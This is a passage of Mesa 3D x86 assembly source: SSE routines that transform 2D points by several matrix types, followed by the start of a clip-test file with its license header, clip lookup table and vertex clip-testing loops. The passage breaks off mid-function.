 * Loop termination is by pointer comparison: ECX = dest start + count*16.
 * NOTE: MOVAPS loads/stores require 16-byte aligned matrix and dest
 * vertices (see the alignment TODO at the top of this file).
 */
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points2_general)
HIDDEN (_mesa_sse_transform_points2_general)
GLNAME( _mesa_sse_transform_points2_general ):
#define FRAME_OFFSET 8
PUSH_L ( ESI )
PUSH_L ( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX )
JZ( LLBL(K_GTP2GR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVAPS( M(0), XMM0 ) /* m3 | m2 | m1 | m0 */
MOVAPS( M(4), XMM1 ) /* m7 | m6 | m5 | m4 */
MOVAPS( M(12), XMM2 ) /* m15 | m14 | m13 | m12 */
ALIGNTEXT32
LLBL(K_GTP2GR_top):
MOVSS( S(0), XMM3 ) /* ox */
SHUFPS( CONST(0x0), XMM3, XMM3 ) /* ox | ox | ox | ox */
MULPS( XMM0, XMM3 ) /* ox*m3 | ox*m2 | ox*m1 | ox*m0 */
MOVSS( S(1), XMM4 ) /* oy */
SHUFPS( CONST(0x0), XMM4, XMM4 ) /* oy | oy | oy | oy */
MULPS( XMM1, XMM4 ) /* oy*m7 | oy*m6 | oy*m5 | oy*m4 */
ADDPS( XMM4, XMM3 ) /* + ox*row0 */
ADDPS( XMM2, XMM3 ) /* + row3 (translation) */
MOVAPS( XMM3, D(0) ) /* aligned store of all 4 result floats */
LLBL(K_GTP2GR_skip):
ADD_L ( CONST(16), EDI )
ADD_L ( EAX, ESI )
CMP_L ( ECX, EDI )
JNE ( LLBL(K_GTP2GR_top) )
LLBL(K_GTP2GR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
/*
 * _mesa_sse_transform_points2_identity
 *
 * Identity transform for 2-component points: copies ox, oy per vertex
 * using plain 32-bit integer moves (no SSE needed).  Skips the copy loop
 * entirely when source and dest start pointers are identical.
 */
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points2_identity)
HIDDEN(_mesa_sse_transform_points2_identity)
GLNAME( _mesa_sse_transform_points2_identity ):
#define FRAME_OFFSET 8
PUSH_L ( ESI )
PUSH_L ( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP2IR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_2), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(2), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
CMP_L( ESI, EDI )
JE( LLBL(K_GTP2IR_finish) ) /* in-place: nothing to copy */
ALIGNTEXT32
LLBL(K_GTP2IR_top):
MOV_L ( S(0), EDX ) /* copy ox */
MOV_L ( EDX, D(0) )
MOV_L ( S(1), EDX ) /* copy oy */
MOV_L ( EDX, D(1) )
LLBL(K_GTP2IR_skip):
ADD_L ( CONST(16), EDI )
ADD_L ( EAX, ESI )
CMP_L ( ECX, EDI )
JNE ( LLBL(K_GTP2IR_top) )
LLBL(K_GTP2IR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
/*
 * _mesa_sse_transform_points2_3d_no_rot
 *
 * SSE transform of 2-component points by a 3D matrix with no rotation:
 * r0 = ox*m0 + m12, r1 = oy*m5 + m13, r2 = m14 (constant per matrix).
 * Dest is size 3 / VEC_SIZE_3.  Uses only MOVLPS/MOVSS so no 16-byte
 * alignment of the vertex data is required here.
 */
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points2_3d_no_rot)
HIDDEN(_mesa_sse_transform_points2_3d_no_rot)
GLNAME(_mesa_sse_transform_points2_3d_no_rot):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP23DNRR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVSS ( M(0), XMM1 ) /* - | - | - | m0 */
MOVSS ( M(5), XMM2 ) /* - | - | - | m5 */
UNPCKLPS ( XMM2, XMM1 ) /* - | - | m5 | m0 */
MOVLPS ( M(12), XMM2 ) /* - | - | m13 | m12 */
MOVSS ( M(14), XMM3 ) /* - | - | - | m14 */
ALIGNTEXT32
LLBL(K_GTP23DNRR_top):
MOVLPS ( S(0), XMM0 ) /* - | - | oy | ox */
MULPS ( XMM1, XMM0 ) /* - | - | oy*m5 | ox*m0 */
ADDPS ( XMM2, XMM0 ) /* - | - | +m13 | +m12 */
MOVLPS ( XMM0, D(0) ) /* -> D(1) | -> D(0) */
MOVSS ( XMM3, D(2) ) /* -> D(2) */
LLBL(K_GTP23DNRR_skip):
ADD_L ( CONST(16), EDI )
ADD_L ( EAX, ESI )
CMP_L ( ECX, EDI )
JNE ( LLBL(K_GTP23DNRR_top) )
LLBL(K_GTP23DNRR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
/*
 * _mesa_sse_transform_points2_perspective
 *
 * SSE transform of 2-component points by a perspective matrix:
 * r0 = ox*m0, r1 = oy*m5, r2 = m14, r3 = 0.
 * Dest is size 4 / VEC_SIZE_4.  XMM0 is zeroed once and stored to D(3)
 * every iteration.
 */
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points2_perspective)
HIDDEN(_mesa_sse_transform_points2_perspective)
GLNAME(_mesa_sse_transform_points2_perspective):
#define FRAME_OFFSET 8
PUSH_L ( ESI )
PUSH_L ( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP23PR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVSS ( M(0), XMM1 ) /* - | - | - | m0 */
MOVSS ( M(5), XMM2 ) /* - | - | - | m5 */
UNPCKLPS ( XMM2, XMM1 ) /* - | - | m5 | m0 */
MOVSS ( M(14), XMM3 ) /* m14 */
XORPS ( XMM0, XMM0 ) /* 0 | 0 | 0 | 0 */
ALIGNTEXT32
LLBL(K_GTP23PR_top):
MOVLPS( S(0), XMM4 ) /* oy | ox */
MULPS( XMM1, XMM4 ) /* oy*m5 | ox*m0 */
MOVLPS( XMM4, D(0) ) /* ->D(1) | ->D(0) */
MOVSS( XMM3, D(2) ) /* ->D(2) */
MOVSS( XMM0, D(3) ) /* ->D(3) */
LLBL(K_GTP23PR_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(K_GTP23PR_top) )
LLBL(K_GTP23PR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
/*
 * _mesa_sse_transform_points2_2d
 *
 * SSE transform of 2-component points by a 2D matrix:
 * (r1|r0) = ox*(m1|m0) + oy*(m5|m4) + (m13|m12).
 * Dest is size 2 / VEC_SIZE_2.  Only the low two lanes of the XMM
 * registers are meaningful; the upper lanes are never stored.
 */
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points2_2d)
HIDDEN(_mesa_sse_transform_points2_2d)
GLNAME(_mesa_sse_transform_points2_2d):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP23P2DR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_2), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(2), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVLPS( M(0), XMM0 ) /* m1 | m0 */
MOVLPS( M(4), XMM1 ) /* m5 | m4 */
MOVLPS( M(12), XMM2 ) /* m13 | m12 */
ALIGNTEXT32
LLBL(K_GTP23P2DR_top):
MOVSS( S(0), XMM3 ) /* ox */
SHUFPS( CONST(0x0), XMM3, XMM3 ) /* ox | ox */
MULPS( XMM0, XMM3 ) /* ox*m1 | ox*m0 */
MOVSS( S(1), XMM4 ) /* oy */
SHUFPS( CONST(0x0), XMM4, XMM4 ) /* oy | oy */
MULPS( XMM1, XMM4 ) /* oy*m5 | oy*m4 */
ADDPS( XMM4, XMM3 ) /* sum the two products */
ADDPS( XMM2, XMM3 ) /* + translation */
MOVLPS( XMM3, D(0) ) /* ->D(1) | ->D(0) */
LLBL(K_GTP23P2DR_skip):
ADD_L ( CONST(16), EDI )
ADD_L ( EAX, ESI )
CMP_L ( ECX, EDI )
JNE ( LLBL(K_GTP23P2DR_top) )
LLBL(K_GTP23P2DR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
/*
 * _mesa_sse_transform_points2_2d_no_rot
 *
 * SSE transform of 2-component points by a 2D matrix with no rotation:
 * r0 = ox*m0 + m12, r1 = oy*m5 + m13.  Dest is size 2 / VEC_SIZE_2.
 */
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points2_2d_no_rot)
HIDDEN(_mesa_sse_transform_points2_2d_no_rot)
GLNAME(_mesa_sse_transform_points2_2d_no_rot):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP23P2DNRR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_2), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(2), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVSS ( M(0), XMM1 ) /* m0 */
MOVSS ( M(5), XMM2 ) /* m5 */
UNPCKLPS ( XMM2, XMM1 ) /* m5 | m0 */
MOVLPS ( M(12), XMM2 ) /* m13 | m12 */
ALIGNTEXT32
LLBL(K_GTP23P2DNRR_top):
MOVLPS( S(0), XMM0 ) /* oy | ox */
MULPS( XMM1, XMM0 ) /* oy*m5 | ox*m0 */
ADDPS( XMM2, XMM0 ) /* +m13 | +m12 */
MOVLPS( XMM0, D(0) ) /* ->D(1) | ->D(0) */
LLBL(K_GTP23P2DNRR_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(K_GTP23P2DNRR_top) )
LLBL(K_GTP23P2DNRR_finish):
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
/*
 * _mesa_sse_transform_points2_3d
 *
 * SSE transform of 2-component points by a 3D matrix:
 * (r2|r1|r0) = ox*(m2|m1|m0) + oy*(m6|m5|m4) + (m14|m13|m12).
 * Dest is size 3 / VEC_SIZE_3.  The third result lane is extracted via
 * UNPCKHPS + MOVSS since only three floats are stored per vertex.
 * NOTE: the MOVAPS matrix loads require a 16-byte aligned matrix.
 */
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points2_3d)
HIDDEN(_mesa_sse_transform_points2_3d)
GLNAME(_mesa_sse_transform_points2_3d):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP23P3DR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVAPS( M(0), XMM0 ) /* m2 | m1 | m0 */
MOVAPS( M(4), XMM1 ) /* m6 | m5 | m4 */
MOVAPS( M(12), XMM2 ) /* m14 | m13 | m12 */
ALIGNTEXT32
LLBL(K_GTP23P3DR_top):
MOVSS( S(0), XMM3 ) /* ox */
SHUFPS( CONST(0x0), XMM3, XMM3 ) /* ox | ox | ox */
MULPS( XMM0, XMM3 ) /* ox*m2 | ox*m1 | ox*m0 */
MOVSS( S(1), XMM4 ) /* oy */
SHUFPS( CONST(0x0), XMM4, XMM4 ) /* oy | oy | oy */
MULPS( XMM1, XMM4 ) /* oy*m6 | oy*m5 | oy*m4 */
ADDPS( XMM4, XMM3 ) /* sum the two products */
ADDPS( XMM2, XMM3 ) /* + translation */
MOVLPS( XMM3, D(0) ) /* ->D(1) | ->D(0) */
UNPCKHPS( XMM3, XMM3 ) /* move lane 2 down to lane 0 */
MOVSS( XMM3, D(2) ) /* ->D(2) */
LLBL(K_GTP23P3DR_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(K_GTP23P3DR_top) )
LLBL(K_GTP23P3DR_finish):
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
#endif
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 8,959
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/x86_cliptest.S
|
/* $Id: x86_cliptest.S,v 1.1.1.1 2012/03/29 17:22:10 uid42307 Exp $ */
/*
* Mesa 3-D graphics library
* Version: 3.5
*
* Copyright (C) 1999-2001 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
/*
* NOTE: Avoid using spaces in between '(' ')' and arguments, especially
* with macros like CONST, LLBL that expand to CONCAT(...). Putting spaces
* in there will break the build on some platforms.
*/
#include "matypes.h"
#include "clip_args.h"
#define SRC0 REGOFF(0, ESI)
#define SRC1 REGOFF(4, ESI)
#define SRC2 REGOFF(8, ESI)
#define SRC3 REGOFF(12, ESI)
#define DST0 REGOFF(0, EDI)
#define DST1 REGOFF(4, EDI)
#define DST2 REGOFF(8, EDI)
#define DST3 REGOFF(12, EDI)
#define MAT0 REGOFF(0, EDX)
#define MAT1 REGOFF(4, EDX)
#define MAT2 REGOFF(8, EDX)
#define MAT3 REGOFF(12, EDX)
/*
* Table for clip test.
*
* bit6 = SRC3 < 0
* bit5 = SRC2 < 0
* bit4 = abs(S(2)) > abs(S(3))
* bit3 = SRC1 < 0
* bit2 = abs(S(1)) > abs(S(3))
* bit1 = SRC0 < 0
* bit0 = abs(S(0)) > abs(S(3))
*/
/*
 * 128-byte lookup table: the index is the 7-bit sign/magnitude code
 * built incrementally in ECX by the cliptest loops (bit layout documented
 * in the comment block above); the value is the resulting clipmask byte.
 */
SEG_DATA
clip_table:
D_BYTE 0x00, 0x01, 0x00, 0x02, 0x04, 0x05, 0x04, 0x06
D_BYTE 0x00, 0x01, 0x00, 0x02, 0x08, 0x09, 0x08, 0x0a
D_BYTE 0x20, 0x21, 0x20, 0x22, 0x24, 0x25, 0x24, 0x26
D_BYTE 0x20, 0x21, 0x20, 0x22, 0x28, 0x29, 0x28, 0x2a
D_BYTE 0x00, 0x01, 0x00, 0x02, 0x04, 0x05, 0x04, 0x06
D_BYTE 0x00, 0x01, 0x00, 0x02, 0x08, 0x09, 0x08, 0x0a
D_BYTE 0x10, 0x11, 0x10, 0x12, 0x14, 0x15, 0x14, 0x16
D_BYTE 0x10, 0x11, 0x10, 0x12, 0x18, 0x19, 0x18, 0x1a
D_BYTE 0x3f, 0x3d, 0x3f, 0x3e, 0x37, 0x35, 0x37, 0x36
D_BYTE 0x3f, 0x3d, 0x3f, 0x3e, 0x3b, 0x39, 0x3b, 0x3a
D_BYTE 0x2f, 0x2d, 0x2f, 0x2e, 0x27, 0x25, 0x27, 0x26
D_BYTE 0x2f, 0x2d, 0x2f, 0x2e, 0x2b, 0x29, 0x2b, 0x2a
D_BYTE 0x3f, 0x3d, 0x3f, 0x3e, 0x37, 0x35, 0x37, 0x36
D_BYTE 0x3f, 0x3d, 0x3f, 0x3e, 0x3b, 0x39, 0x3b, 0x3a
D_BYTE 0x1f, 0x1d, 0x1f, 0x1e, 0x17, 0x15, 0x17, 0x16
D_BYTE 0x1f, 0x1d, 0x1f, 0x1e, 0x1b, 0x19, 0x1b, 0x1a
SEG_TEXT
/*
* _mesa_x86_cliptest_points4
*
* AL: ormask
* AH: andmask
* EBX: temp0
* ECX: temp1
* EDX: clipmask[]
* ESI: clip[]
* EDI: proj[]
* EBP: temp2
*/
#if defined(__ELF__) && defined(__PIC__) && defined(GNU_ASSEMBLER) && !defined(ELFPIC)
#define ELFPIC
#endif
/*
 * _mesa_x86_cliptest_points4
 *
 * Clip-tests 4-component points and projects unclipped ones to NDC.
 * Per vertex: builds a 7-bit sign/magnitude code from SRC0..SRC3 with an
 * ADD/ADC carry chain (ADD reg,reg shifts the sign bit into CF; CMP
 * compares doubled magnitudes, exploiting the IEEE-754 bit layout), maps
 * it through clip_table to a clipmask byte, ORs into AL / ANDs into AH,
 * and stores it.  Clipped vertices get (0,0,0,1) in dest; unclipped ones
 * get (x,y,z,w)*1/w computed on the x87 stack (the 1/w divide is started
 * before the integer work to hide its latency).  Returns dest in EAX.
 * Register roles are documented in the comment block above.
 */
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_cliptest_points4 )
HIDDEN(_mesa_x86_cliptest_points4)
GLNAME( _mesa_x86_cliptest_points4 ):
#ifdef ELFPIC
#define FRAME_OFFSET 20
#else
#define FRAME_OFFSET 16
#endif
PUSH_L( ESI )
PUSH_L( EDI )
PUSH_L( EBP )
PUSH_L( EBX )
#ifdef ELFPIC
/* store pointer to clip_table on stack */
CALL( LLBL(ctp4_get_eip) )
ADD_L( CONST(_GLOBAL_OFFSET_TABLE_), EBX )
MOV_L( REGOFF(clip_table@GOT, EBX), EBX )
PUSH_L( EBX )
JMP( LLBL(ctp4_clip_table_ready) )
LLBL(ctp4_get_eip):
/* store eip in ebx */
MOV_L( REGIND(ESP), EBX )
RET
LLBL(ctp4_clip_table_ready):
#endif
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_CLIP, EDX )
MOV_L( ARG_OR, EBX )
MOV_L( ARG_AND, EBP )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) )
MOV_L( EAX, ARG_SOURCE ) /* put stride in ARG_SOURCE */
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDX, ECX )
MOV_L( ECX, ARG_CLIP ) /* put clipmask + count in ARG_CLIP */
CMP_L( ECX, EDX )
MOV_B( REGIND(EBX), AL ) /* AL = running OR-mask */
MOV_B( REGIND(EBP), AH ) /* AH = running AND-mask */
JZ( LLBL(ctp4_finish) ) /* count == 0 */
ALIGNTEXT16
LLBL(ctp4_top):
FLD1 /* F3 */
FDIV_S( SRC3 ) /* GH: don't care about div-by-zero */
MOV_L( SRC3, EBP )
MOV_L( SRC2, EBX )
XOR_L( ECX, ECX )
ADD_L( EBP, EBP ) /* ebp = abs(S(3))*2 ; carry = sign of S(3) */
ADC_L( ECX, ECX )
ADD_L( EBX, EBX ) /* ebx = abs(S(2))*2 ; carry = sign of S(2) */
ADC_L( ECX, ECX )
CMP_L( EBX, EBP ) /* carry = abs(S(2))*2 > abs(S(3))*2 */
ADC_L( ECX, ECX )
MOV_L( SRC1, EBX )
ADD_L( EBX, EBX ) /* ebx = abs(S(1))*2 ; carry = sign of S(1) */
ADC_L( ECX, ECX )
CMP_L( EBX, EBP ) /* carry = abs(S(1))*2 > abs(S(3))*2 */
ADC_L( ECX, ECX )
MOV_L( SRC0, EBX )
ADD_L( EBX, EBX ) /* ebx = abs(S(0))*2 ; carry = sign of S(0) */
ADC_L( ECX, ECX )
CMP_L( EBX, EBP ) /* carry = abs(S(0))*2 > abs(S(3))*2 */
ADC_L( ECX, ECX )
#ifdef ELFPIC
MOV_L( REGIND(ESP), EBP ) /* clip_table */
MOV_B( REGBI(EBP, ECX), CL )
#else
MOV_B( REGOFF(clip_table,ECX), CL )
#endif
OR_B( CL, AL ) /* accumulate OR-mask */
AND_B( CL, AH ) /* accumulate AND-mask */
TEST_B( CL, CL )
MOV_B( CL, REGIND(EDX) ) /* store per-vertex clipmask */
JZ( LLBL(ctp4_proj) ) /* mask == 0: project this vertex */
LLBL(ctp4_noproj):
FSTP( ST(0) ) /* pop the unused 1/w */
MOV_L( CONST(0), DST0 )
MOV_L( CONST(0), DST1 )
MOV_L( CONST(0), DST2 )
MOV_L( CONST(0x3f800000), DST3 ) /* 1.0f */
JMP( LLBL(ctp4_next) )
LLBL(ctp4_proj):
FLD_S( SRC0 ) /* F0 F3 */
FMUL2( ST(1), ST0 )
FLD_S( SRC1 ) /* F1 F0 F3 */
FMUL2( ST(2), ST0 )
FLD_S( SRC2 ) /* F2 F1 F0 F3 */
FMUL2( ST(3), ST0 )
FXCH( ST(2) ) /* F0 F1 F2 F3 */
FSTP_S( DST0 ) /* F1 F2 F3 */
FSTP_S( DST1 ) /* F2 F3 */
FSTP_S( DST2 ) /* F3 */
FSTP_S( DST3 ) /* */
LLBL(ctp4_next):
INC_L( EDX )
ADD_L( CONST(16), EDI )
ADD_L( ARG_SOURCE, ESI )
CMP_L( EDX, ARG_CLIP )
JNZ( LLBL(ctp4_top) )
MOV_L( ARG_OR, ECX )
MOV_L( ARG_AND, EDX )
MOV_B( AL, REGIND(ECX) ) /* write back accumulated OR-mask */
MOV_B( AH, REGIND(EDX) ) /* write back accumulated AND-mask */
LLBL(ctp4_finish):
MOV_L( ARG_DEST, EAX )
#ifdef ELFPIC
POP_L( ESI ) /* discard ptr to clip_table */
#endif
POP_L( EBX )
POP_L( EBP )
POP_L( EDI )
POP_L( ESI )
RET
/*
 * _mesa_x86_cliptest_points4_np
 *
 * Non-projecting variant of _mesa_x86_cliptest_points4: computes and
 * stores only the per-vertex clipmask bytes plus the accumulated OR/AND
 * masks; no x87 projection is performed and dest vertices are untouched.
 * The sign/magnitude ADD/ADC carry chain and clip_table lookup are
 * identical to the projecting version.  Returns the source vector in EAX.
 */
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_cliptest_points4_np )
HIDDEN(_mesa_x86_cliptest_points4_np)
GLNAME( _mesa_x86_cliptest_points4_np ):
#ifdef ELFPIC
#define FRAME_OFFSET 20
#else
#define FRAME_OFFSET 16
#endif
PUSH_L( ESI )
PUSH_L( EDI )
PUSH_L( EBP )
PUSH_L( EBX )
#ifdef ELFPIC
/* store pointer to clip_table on stack */
CALL( LLBL(ctp4_np_get_eip) )
ADD_L( CONST(_GLOBAL_OFFSET_TABLE_), EBX )
MOV_L( REGOFF(clip_table@GOT, EBX), EBX )
PUSH_L( EBX )
JMP( LLBL(ctp4_np_clip_table_ready) )
LLBL(ctp4_np_get_eip):
/* store eip in ebx */
MOV_L( REGIND(ESP), EBX )
RET
LLBL(ctp4_np_clip_table_ready):
#endif
MOV_L( ARG_SOURCE, ESI )
/* slot */
MOV_L( ARG_CLIP, EDX )
MOV_L( ARG_OR, EBX )
MOV_L( ARG_AND, EBP )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( EAX, ARG_DEST ) /* put stride in ARG_DEST */
ADD_L( EDX, ECX )
MOV_L( ECX, EDI ) /* put clipmask + count in EDI */
CMP_L( ECX, EDX )
